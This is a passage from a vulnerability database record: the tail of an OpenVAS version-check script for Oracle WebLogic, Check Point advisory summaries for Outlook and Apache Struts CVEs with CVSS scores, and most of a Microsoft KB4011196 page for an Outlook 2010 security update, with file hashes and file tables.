application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to have an impact on confidentiality, integrity and availability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.3.0, 12.2.1.1 and 12.2.1.2.\");\n\n script_tag(name:\"solution\", value:\"See the referenced advisories for a solution.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\naffected = make_list('10.3.6.0.0', '12.1.3.0.0', '12.2.1.2.0', '12.2.1.1.0');\n\nforeach af (affected) {\n if( version == af) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:20:43", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-04T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Outlook Security Feature Bypass (CVE-2017-11774)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774"], "modified": "2019-07-04T00:00:00", "id": "CPAI-2019-0832", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:34:07", "description": "A remote code execution vulnerability exists in Apache Struts. This vulnerability is due to the an insecure deserialization. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-06T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts REST Plugin XStream Deserialization Remote Code Execution (CVE-2017-9805)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2017-09-13T00:00:00", "id": "CPAI-2017-0742", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T10:32:49", "description": "A remote code execution vulnerability exists in Apache Struts2. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Content-Type Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-09-28T00:00:00", "id": "CPAI-2017-0197", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:37", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Jakarta multipart parser. An attacker could exploit this vulnerability by sending an invalid content-disposition as part of a file upload request. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 Content-Disposition Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0676", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-06-25T10:48:01", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11774>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Office 2010](<http://support.microsoft.com/kb/2687455>) installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home. (See Determining your Office version.)\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011196>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011196 for the 32-bit version of Outlook 2010](<http://www.microsoft.com/download/details.aspx?familyid=dcb51340-7b39-4651-b382-045a5a1ddbba>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download the security update KB4011196 for the 64-bit version of Outlook 2010](<http://www.microsoft.com/download/details.aspx?familyid=207e044e-feac-47dd-836e-1980ea5f5aeb>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: October 10, 2017](<https://support.microsoft.com/en-us/help/20171010>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB 4011089](<http://support.microsoft.com/kb/4011089>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \noutlookloc2010-kb4011196-fullfile-x64-glb.exe| B24134605DD80F596E0552A9CD660003980D3E43| E4B9A0B1C9DEED4C59829322CABE0A7F1E84181AF623F4CB4BF1341A0B96A084 \noutlookloc2010-kb4011196-fullfile-x86-glb.exe| B56D19E495D7688B73478CC4AF62962E6CA47B44| 98264CF24727746C206DC6DDA45FE1C234B81EC6CB86508F05F4DDC09BD86B85 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x86-based versions of Outlook 2010\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \ncnfnot32.exe_0004| cnfnot32.exe| 14.0.7187.5000| 161,984| 19-Jul-2017| 06:40 \ncontab32.dll| contab32.dll| 14.0.7180.5000| 145,144| 15-Mar-2017| 05:11 \ndlgsetp.dll| dlgsetp.dll| 14.0.7187.5000| 98,024| 19-Jul-2017| 06:40 \nemsmdb32.dll_0005| emsmdb32.dll| 14.0.7187.5000| 2,054,008| 23-Jul-2017| 01:12 \nenvelope.dll| envelope.dll| 14.0.7180.5000| 165,128| 15-Mar-2017| 02:04 \nexsec32.dll_0001| exsec32.dll| 14.0.7187.5000| 341,664| 23-Jul-2017| 01:12 \nimpmail.dll| impmail.dll| 14.0.7180.5000| 145,112| 15-Mar-2017| 02:04 \nmapiph.dll| mapiph.dll| 14.0.7180.5000| 286,528| 15-Mar-2017| 02:04 \nmimedir.dll| mimedir.dll| 14.0.7187.5000| 369,856| 19-Jul-2017| 06:40 \nmlshext.dll| mlshext.dll| 14.0.7180.5000| 30,984| 15-Mar-2017| 02:04 \nmspst32.dll_0004| mspst32.dll| 14.0.7180.5000| 1,215,856| 15-Mar-2017| 05:11 \nolkfstub.dll.x86| olkfstub.dll| 14.0.7180.5000| 264,960| 15-Mar-2017| 02:04 \nolmapi32.dll| olmapi32.dll| 14.0.7188.5000| 3,397,376| 26-Aug-2017| 01:07 \nomsmain.dll| omsmain.dll| 14.0.7180.5000| 734,976| 15-Mar-2017| 05:04 \nomsxp32.dll| omsxp32.dll| 14.0.7180.5000| 243,496| 15-Mar-2017| 05:04 \noutlctl.dll| outlctl.dll| 14.0.7180.5000| 132,800| 15-Mar-2017| 02:04 \noutlmime.dll| outlmime.dll| 14.0.7187.5000| 534,800| 19-Jul-2017| 06:40 \noutlook.exe| outlook.exe| 14.0.7189.5000| 15,980,232| 14-Sep-2017| 05:10 \noutlph.dll| outlph.dll| 14.0.7180.5000| 332,592| 15-Mar-2017| 05:11 \noutlrpc.dll| outlrpc.dll| 14.0.7180.5000| 52,912| 15-Mar-2017| 05:11 \noutlvbs.dll_0001| outlvbs.dll| 14.0.7180.5000| 65,768| 15-Mar-2017| 02:04 \npstprx32.dll| pstprx32.dll| 14.0.7187.5000| 320,208| 19-Jul-2017| 06:40 \nrecall.dll| recall.dll| 14.0.7180.5000| 54,488| 15-Mar-2017| 02:04 \nrm.dll| rm.dll| 14.0.7180.5000| 88,272| 15-Mar-2017| 02:04 \nrtfhtml.dll| rtfhtml.dll| 14.0.7180.5000| 417,512| 15-Mar-2017| 05:11 \nscanpst.exe_0002| scanpst.exe| 14.0.7180.5000| 49,480| 15-Mar-2017| 02:04 \nscnpst32.dll| scnpst32.dll| 14.0.7180.5000| 346,968| 15-Mar-2017| 02:04 \nscnpst64.dll| scnpst64.dll| 14.0.7180.5000| 357,736| 15-Mar-2017| 02:04 \ntransmgr.dll| transmgr.dll| 14.0.7180.5000| 115,456| 15-Mar-2017| 01:29 \nmapir.dll_1025| mapir.dll| 14.0.7157| 1,097,296| 13-Aug-2015| 09:57 \nmsmapi32.dll_0001_1025| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1025| outllibr.dll| 14.0.7188| 6,593,256| 25-Aug-2017| 01:19 \nmapir.dll_1026| mapir.dll| 14.0.7157| 1,166,416| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1026| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1026| outllibr.dll| 14.0.7188| 6,671,080| 25-Aug-2017| 01:21 \nmapir.dll_1029| mapir.dll| 14.0.7157| 1,139,376| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1029| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1029| outllibr.dll| 14.0.7188| 6,651,112| 25-Aug-2017| 01:21 \nmapir.dll_1030| mapir.dll| 14.0.7157| 1,142,864| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1030| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1030| outllibr.dll| 14.0.7188| 6,462,696| 25-Aug-2017| 01:21 \nmapir.dll_1031| mapir.dll| 14.0.7157| 1,195,088| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1031| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1031| outllibr.dll| 14.0.7188| 6,672,616| 25-Aug-2017| 01:23 \nmapir.dll_1032| mapir.dll| 14.0.7157| 1,217,104| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1032| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1032| outllibr.dll| 14.0.7188| 6,757,608| 25-Aug-2017| 01:23 \nmapir.dll_1033| mapir.dll| 14.0.7155.5000| 1,126,576| 16-Jul-2015| 08:58 \nmsmapi32.dll_0001_1033| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1033| outllibr.dll| 14.0.7185.5000| 6,592,744| 08-Jul-2017| 11:45 \nmapir.dll_3082| mapir.dll| 14.0.7157| 1,178,704| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_3082| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_3082| outllibr.dll| 14.0.7188| 6,606,568| 25-Aug-2017| 01:22 \nmapir.dll_1061| mapir.dll| 14.0.7157| 1,124,432| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1061| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1061| outllibr.dll| 14.0.7188| 6,608,616| 25-Aug-2017| 01:23 \nmapir.dll_1069| mapir.dll| 14.0.7157| 1,159,248| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1069| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1069| outllibr.dll| 14.0.7188| 6,623,464| 25-Aug-2017| 01:24 \nmapir.dll_1035| mapir.dll| 14.0.7157| 1,138,768| 13-Aug-2015| 10:01 \nmsmapi32.dll_0001_1035| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1035| outllibr.dll| 14.0.7188| 6,614,248| 25-Aug-2017| 01:24 \nmapir.dll_1036| mapir.dll| 14.0.7157| 1,194,064| 13-Aug-2015| 10:01 \nmsmapi32.dll_0001_1036| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1036| outllibr.dll| 14.0.7188| 6,683,880| 25-Aug-2017| 01:25 \nmapir.dll_1037| mapir.dll| 14.0.7157| 1,083,984| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1037| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1037| outllibr.dll| 14.0.7188| 6,574,312| 25-Aug-2017| 01:24 \nmapir.dll_1081| mapir.dll| 14.0.7157| 1,142,352| 13-Aug-2015| 10:00 \nmsmapi32.dll_0001_1081| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1081| outllibr.dll| 14.0.7188| 6,647,528| 25-Aug-2017| 01:24 \nmapir.dll_1050| mapir.dll| 14.0.7157| 1,146,544| 13-Aug-2015| 10:03 \nmsmapi32.dll_0001_1050| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1050| outllibr.dll| 14.0.7188| 6,625,000| 25-Aug-2017| 01:25 \nmapir.dll_1038| mapir.dll| 14.0.7157| 1,150,128| 13-Aug-2015| 10:03 \nmsmapi32.dll_0001_1038| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1038| outllibr.dll| 14.0.7188| 6,671,080| 25-Aug-2017| 01:24 \nenvelopr.dll_1040| envelopr.dll| 14.0.7007| 19,048| 14-Dec-2012| 10:59 \nmapir.dll_1040| mapir.dll| 14.0.7157| 1,159,760| 13-Aug-2015| 10:03 \nmsmapi32.dll_0001_1040| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1040| outllibr.dll| 14.0.7188| 6,496,488| 25-Aug-2017| 01:29 \nmapir.dll_1041| mapir.dll| 14.0.7157| 1,015,888| 13-Aug-2015| 03:34 \nmsmapi32.dll_0001_1041| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1041| outllibr.dll| 14.0.7188| 6,701,800| 24-Aug-2017| 08:32 \nmapir.dll_1087| mapir.dll| 14.0.7157| 1,141,840| 13-Aug-2015| 10:03 \nmsmapi32.dll_0001_1087| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1087| outllibr.dll| 14.0.7188| 6,661,352| 25-Aug-2017| 01:26 \nmapir.dll_1042| mapir.dll| 14.0.7157| 1,004,624| 13-Aug-2015| 10:12 \nmsmapi32.dll_0001_1042| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1042| outllibr.dll| 14.0.7188| 6,672,104| 25-Aug-2017| 01:30 \nmapir.dll_1063| mapir.dll| 14.0.7157| 1,145,008| 13-Aug-2015| 10:12 \nmsmapi32.dll_0001_1063| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1063| outllibr.dll| 14.0.7188| 6,655,208| 25-Aug-2017| 01:27 \nmapir.dll_1062| mapir.dll| 14.0.7157| 1,141,328| 13-Aug-2015| 10:05 \nmsmapi32.dll_0001_1062| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1062| outllibr.dll| 14.0.7188| 6,650,600| 25-Aug-2017| 01:28 \nmapir.dll_1044| mapir.dll| 14.0.7157| 1,128,016| 13-Aug-2015| 10:05 \nmsmapi32.dll_0001_1044| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1044| outllibr.dll| 14.0.7188| 6,599,912| 25-Aug-2017| 01:26 \nmapir.dll_1043| mapir.dll| 14.0.7157| 1,172,144| 13-Aug-2015| 10:06 \nmsmapi32.dll_0001_1043| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1043| outllibr.dll| 14.0.7188| 6,645,992| 25-Aug-2017| 01:28 \nmapir.dll_1045| mapir.dll| 14.0.7157| 1,166,000| 13-Aug-2015| 10:05 \nmsmapi32.dll_0001_1045| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1045| outllibr.dll| 14.0.7188| 6,676,712| 25-Aug-2017| 01:28 \nmapir.dll_1046| mapir.dll| 14.0.7157| 1,168,976| 13-Aug-2015| 10:12 \nmsmapi32.dll_0001_1046| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1046| outllibr.dll| 14.0.7188| 6,387,432| 25-Aug-2017| 01:28 \nmapir.dll_2070| mapir.dll| 14.0.7157| 1,177,680| 13-Aug-2015| 10:06 \nmsmapi32.dll_0001_2070| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_2070| outllibr.dll| 14.0.7188| 6,654,696| 25-Aug-2017| 01:29 \nmapir.dll_1048| mapir.dll| 14.0.7157| 1,159,760| 13-Aug-2015| 10:06 \nmsmapi32.dll_0001_1048| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1048| outllibr.dll| 14.0.7188| 6,642,920| 25-Aug-2017| 01:30 \nmapir.dll_1049| mapir.dll| 14.0.7157| 1,141,424| 13-Aug-2015| 10:06 \nmsmapi32.dll_0001_1049| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1049| outllibr.dll| 14.0.7188| 6,658,792| 25-Aug-2017| 01:30 \nmapir.dll_1051| mapir.dll| 14.0.7157| 1,156,784| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1051| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1051| outllibr.dll| 14.0.7188| 6,665,960| 25-Aug-2017| 01:29 \nmapir.dll_1060| mapir.dll| 14.0.7157| 1,142,864| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1060| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1060| outllibr.dll| 14.0.7188| 6,627,048| 25-Aug-2017| 01:30 \nmapir.dll_2074| mapir.dll| 14.0.7157| 1,150,544| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_2074| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_2074| outllibr.dll| 14.0.7188| 6,632,680| 25-Aug-2017| 01:31 \nmapir.dll_1053| mapir.dll| 14.0.7157| 1,131,088| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1053| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1053| outllibr.dll| 14.0.7188| 6,597,352| 25-Aug-2017| 01:33 \nmapir.dll_1054| mapir.dll| 14.0.7157| 1,121,872| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1054| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1054| outllibr.dll| 14.0.7188| 6,632,168| 25-Aug-2017| 01:32 \nmapir.dll_1055| mapir.dll| 14.0.7157| 1,127,504| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1055| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1055| outllibr.dll| 14.0.7188| 6,627,048| 25-Aug-2017| 01:34 \nmapir.dll_1058| mapir.dll| 14.0.7157| 1,144,496| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1058| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1058| outllibr.dll| 14.0.7188| 6,665,960| 25-Aug-2017| 01:32 \nmapir.dll_2052| mapir.dll| 14.0.7157| 958,032| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_2052| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_2052| outllibr.dll| 14.0.7188| 6,562,024| 25-Aug-2017| 01:32 \noutlook.hol_2052| outlook.hol| | 1,262,244| 22-Apr-2013| 09:25 \nmapir.dll_1028| mapir.dll| 14.0.7157| 958,640| 13-Aug-2015| 10:13 \nmsmapi32.dll_0001_1028| msmapi32.dll| 14.0.7180.5000| 56,064| 15-Mar-2017| 05:11 \noutllibr.dll_1028| outllibr.dll| 14.0.7188| 6,554,344| 25-Aug-2017| 01:34 \n \n## \n\n__\n\nFor all supported x64-based versions of Outlook 2010\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \ncnfnot32.exe_0004| cnfnot32.exe| 14.0.7187.5000| 236,224| 19-Jul-2017| 06:46 \ncontab32.dll| contab32.dll| 14.0.7180.5000| 189,168| 15-Mar-2017| 05:12 \ndlgsetp.dll| dlgsetp.dll| 14.0.7187.5000| 127,720| 19-Jul-2017| 06:46 \nemsmdb32.dll_0005| emsmdb32.dll| 14.0.7187.5000| 2,638,712| 23-Jul-2017| 01:09 \nenvelope.dll| envelope.dll| 14.0.7180.5000| 229,640| 15-Mar-2017| 02:12 \nexsec32.dll_0001| exsec32.dll| 14.0.7187.5000| 482,976| 23-Jul-2017| 01:09 \nimpmail.dll| impmail.dll| 14.0.7180.5000| 196,312| 15-Mar-2017| 02:12 \nmapiph.dll| mapiph.dll| 14.0.7180.5000| 432,448| 15-Mar-2017| 02:12 \nmimedir.dll| mimedir.dll| 14.0.7187.5000| 553,664| 19-Jul-2017| 06:46 \nmlshext.dll| mlshext.dll| 14.0.7180.5000| 33,032| 15-Mar-2017| 02:12 \nmspst32.dll_0004| mspst32.dll| 14.0.7180.5000| 1,634,160| 15-Mar-2017| 05:12 \nolkfstub.dll.x64| olkfstub.dll| 14.0.7180.5000| 269,568| 15-Mar-2017| 02:12 \nolmapi32.dll| olmapi32.dll| 14.0.7188.5000| 4,658,944| 26-Aug-2017| 01:04 \nomsmain.dll| omsmain.dll| 14.0.7180.5000| 1,107,720| 15-Mar-2017| 05:09 \nomsxp32.dll| omsxp32.dll| 14.0.7180.5000| 372,008| 15-Mar-2017| 05:09 \noutlctl.dll| outlctl.dll| 14.0.7180.5000| 176,320| 15-Mar-2017| 02:12 \noutlmime.dll| outlmime.dll| 14.0.7187.5000| 732,432| 19-Jul-2017| 06:46 \noutlook.exe| outlook.exe| 14.0.7189.5000| 24,157,384| 14-Sep-2017| 05:19 \noutlph.dll| outlph.dll| 14.0.7180.5000| 387,888| 15-Mar-2017| 05:12 \noutlrpc.dll| outlrpc.dll| 14.0.7180.5000| 67,248| 15-Mar-2017| 05:12 \noutlvbs.dll_0001| outlvbs.dll| 14.0.7180.5000| 81,640| 15-Mar-2017| 02:12 \npstprx32.dll| pstprx32.dll| 14.0.7187.5000| 440,528| 19-Jul-2017| 06:46 \nrecall.dll| recall.dll| 14.0.7180.5000| 66,776| 15-Mar-2017| 02:12 \nrm.dll| rm.dll| 14.0.7180.5000| 109,776| 15-Mar-2017| 02:12 \nrtfhtml.dll| rtfhtml.dll| 14.0.7180.5000| 558,824| 15-Mar-2017| 05:12 \nscanpst.exe_0002| scanpst.exe| 14.0.7180.5000| 57,160| 15-Mar-2017| 02:12 \nscnpst32.dll| scnpst32.dll| 14.0.7180.5000| 460,632| 15-Mar-2017| 02:12 \nscnpst64.dll| scnpst64.dll| 14.0.7180.5000| 458,600| 15-Mar-2017| 02:12 \ntransmgr.dll| transmgr.dll| 14.0.7180.5000| 141,056| 15-Mar-2017| 01:30 \nmapir.dll_1025| mapir.dll| 14.0.7157| 1,095,856| 13-Aug-2015| 09:36 \nmsmapi32.dll_0001_1025| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1025| outllibr.dll| 14.0.7188| 6,588,648| 25-Aug-2017| 12:56 \nmapir.dll_1026| mapir.dll| 14.0.7157| 1,166,416| 13-Aug-2015| 09:41 \nmsmapi32.dll_0001_1026| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1026| outllibr.dll| 14.0.7188| 6,666,984| 25-Aug-2017| 12:57 \nmapir.dll_1029| mapir.dll| 14.0.7157| 1,140,816| 13-Aug-2015| 09:38 \nmsmapi32.dll_0001_1029| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1029| outllibr.dll| 14.0.7188| 6,646,504| 25-Aug-2017| 12:56 \nmapir.dll_1030| mapir.dll| 14.0.7157| 1,141,424| 13-Aug-2015| 09:37 \nmsmapi32.dll_0001_1030| msmapi32.dll| 14.0.7180.5000| 66,816| 15-Mar-2017| 05:12 \noutllibr.dll_1030| outllibr.dll| 